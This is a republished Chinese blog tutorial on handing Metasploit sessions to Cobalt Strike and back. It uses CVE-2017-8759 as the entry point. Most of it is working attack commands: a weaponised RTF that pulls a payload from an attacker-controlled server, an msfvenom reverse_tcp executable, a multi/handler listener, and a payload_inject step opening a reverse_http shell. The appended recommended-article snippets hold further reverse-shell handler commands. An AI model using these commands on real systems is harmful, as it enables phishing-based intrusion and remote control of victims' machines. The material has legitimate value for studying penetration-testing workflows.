metasploit 派生 shell

最新推荐文章于 2022-08-24 14:36:11 发布
最新推荐文章于 2022-08-24 14:36:11 发布
阅读量137 收藏
点赞数
文章标签: shell java 操作系统
原文链接:http://www.cnblogs.com/trojan-z/p/7600928.html
版权

    

1. 前言

    metasploit 获取的 shell 派生给其他工具,例如 Cobaltstrike

    以 CVE-2017-8759 为例通过 msf 获取 shell 后派生给 Cobaltstrike 

 

2. 环境

    Kali : 192.168.229.143

    win7 : 192.168.229.137

Cobaltstrike+jdk:链接:http://pan.baidu.com/s/1eSJ7P54   密码:krqn
CVE-2017-8759-exp:    https://github.com/bhdresh/CVE-2017-8759.git

  kali jdk 环境变量
  

vim /etc/profile
export JAVA_HOME=/usr/share/jdk1.8.0_91
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH

 

3. exploit CVE-2017-8759

# git clone https://github.com/bhdresh/CVE-2017-8759.git
1) 生成 RTF 文件

   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.229.143/logo.txt
   
2) 生成 MSF payload 并启动 handler

   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.143 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.229.143; run"
   
3) 开发模式下传送本地 payload

   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.229.143/shell.exe -l /tmp/shell.exe

 

4. 派生 shell 给 Cobalt strike

    打开 Cobalt strike 创建一个新的监听器

   

    注入一个新的 payload 到当前 session 中

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.229.143
msf exploit(payload_inject) > set LPORT 1212
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

    

 

5. Cobalt strike 派生 shell 给 MSF

    msf 开启 reverse_tcp 监听模式

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.229.143
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit -j

    使用Cobalt Strike创建一个windows/foreign/reverse_tcp Listener

    

    右键 -> Spawn

    

    选择创建的监听器

    

    

 

 

https://secvul.com/topics/862.html

http://blog.csdn.net/qq_27446553/article/details/52282457  

http://www.360doc.com/content/16/0524/09/33492643_561811422.shtml  

 

转载于:https://www.cnblogs.com/trojan-z/p/7600928.html

weixin_30528371
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Metasploit 获取远程 shell
KKKmeng的博客
06-08 243
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。
信息安全技术(二)-- 利用 metasploit 创建并反弹 shell
yi23456qi的博客
06-19 466
知识是不断从学习中得到的,经验是从尝试中得到的!
metasploit生成shellcode
JMasker的博客
02-25 1661
Metasploit中,可以从msfconsole中生成payload。当你使用某个payload的时候,Metasploit可以添加generate,pry和reload命令。本节主要讲述generate命令的使用。 msf > use payload/windows/shell_bind_tcp msf payload(shell_bind_tcp) > help ...snip... Command Description ------- ---
Cobalt strike 派生shell给MSF
weixin_45945976的博客
10-22 471
Cobalt strike 派生shell给MSF,前提是要有beaconshell: 在msf使用监听模块,并设置相关选项: use exploit/multi/handle set payload windows/meterpreter/reverse_http set lhost 10.6.18.56 set lport 4321 run -j 回到Cobalt strike中添加监听器payload为 windows/foreign/reverse_httpc,ip为msf的ip监听端口为msf监
metasploit基础学习 渗透(拿shell)和后渗透(留后门)
qq_38348692的博客
08-10 3493
使用metasploit时,要保持更新的好习惯,更新kali源 ,以及漏洞数据库,更新命令: (1)apt-get update:更新软件包的索引源,作用是同步源的软件包索引 (2)apt-get upgrade: 升级系统上安装的所有软件包 (3)apt-get dist-upgrade: 升级整个linux系统,包括内核升级 专业术语 (1)Auxiliaries:辅助模块,负责执行扫...
Cobalt Strike之与msf互相派生shell
shy的博客
10-28 2933
一,msf派生shell给cobalstrike 1,cs添加监听器 2,msf上在已经获取到的会话(shell)中注入一个新的payload msf exploit(handler) > use exploit/windows/local/payload_inject msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http //cs监听器中相同 msf exploit(payload
2021-06-30cs和msf联动派生会话shell
qq_45290991的博客
06-30 633
一、当cs获取到会话后反弹给msf 1、msf上操作 use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.52.208 set lport 7777 exploit -j #-j 后台监听 12345 2、...
metasploit获取shell之后进一步利用!metasploit+sessions
weixin_34060741的博客
11-30 1285
当你用metasploit成功的***一台Windows主机后,你会获得一个Meterpreter 的Shell,今天我就会给大家讲一讲Meterpreter 获取shell以后的运用 当你看到了 [*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051) 这就代...
使用msf进行反弹shell+内网渗透
热门推荐
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
Metasploit(后渗透攻击:web后门)
qq_41453632的博客
12-10 4762
web后门泛指webshell,其实就是一段网页代码,包括ASP. ASP.NET. PHP. JSP. 代码等。由于这些代码都运行在服务器端,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。这也是攻击者控制服务器的一个方法,比一般的入侵更具隐蔽性。 1.meterpreter后门    在metasploit中,...
Metasploit 之 webshell 提权
收集盒 Book box
08-04 1804
本文所涉及的方法只能在已授权的机器上做测试。     首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^) Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell
后渗透之meterpreter使用攻略
钻石
01-06 8354
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
利用Metasploit获取linux反弹shell的尝试
weixin_42324313的博客
08-19 9647
序 接《Metasploit上使用RPC方式复现一个Linux提权漏洞》。 由于刚刚入手,对很多概念和技术不慎了解,对RPC,mfsd,反弹shell等技术的理解有限,甚至有所偏差,导致前面做的探索差强人意。虽然最后建立了攻击机与靶机之间的连接,并且拿到shell和root权限,但是不能算是真正意义上的Metasploit上使用RPC方式复现一个Linux提权漏洞。 还需要继续进行探索,具体什么...
MSF-Shellcode生成和使用
weixin_34301307的博客
11-12 4693
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
解决Metasploitshell乱码的问题
谢公子的博客
10-20 6771
我们在kali中用 Metasploit 获取到windows主机的shell后,会出现乱码问题,归根到底,就是windows和linux系统的中文编码不同,所以导致windows系统上的中文在linux系统上会乱码 解决办法: 在shell窗口的工具栏选择“编辑”——&gt;“首选项”——&gt;“编码”,随便选中简体中文的三个编码之一:GB18030,GB2312,GBK,我一般选的是GB...
metasploit将命令行shell升级为meterpreter
天元喜羊羊的博客
04-28 8044
msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > set
如何解决shell执行派生shell问题
weixin_33737774的博客
11-16 109
笔者今天写了一个shell script,希望简化登录代理服务器的问题,可是script写好之后,却发现没有按照预想的情况下得到环境变量。 为了让大家好理解,贴出script的内容给各位参阅: 1 vimproxy_http.sh 加入如下配置: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ...
Metasploit拿到shell后 低权限---提权篇
qq_58000413的博客
08-24 1477
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
metasploit 反弹shell
最新发布
10-16
反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值